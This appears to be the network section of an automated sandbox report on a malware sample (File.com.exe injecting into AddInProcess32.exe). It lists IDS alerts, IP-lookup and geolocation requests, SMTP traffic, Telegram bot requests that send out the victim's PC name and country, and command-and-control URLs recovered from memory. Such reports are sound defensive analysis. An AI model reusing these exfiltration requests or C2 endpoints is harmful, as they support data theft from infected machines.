Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.4:49772 -> 185.230.212.164:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2008:15:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2007:07:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.zoho.eu

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 18 Aug 2024 19:25:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 18 Aug 2024 19:25:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: AddInProcess32.exe, 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2962597104.0000000005136000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2962556300.0000000005325000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2962556300.0000000005325000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: AddInProcess32.exe, 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2962597104.0000000005136000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0B
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.zoho.eu
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://status.thawte.com0:
Source: AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2962556300.0000000005325000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002896000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: File.com.exe, 00000000.00000002.1851616746.0000000007392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: AddInProcess32.exe, 00000011.00000002.2962556300.0000000005327000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2941746000.0000000002898000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: AddInProcess32.exe, 00000011.00000002.2944387011.000000000307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enhF
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000003086000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enx6
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
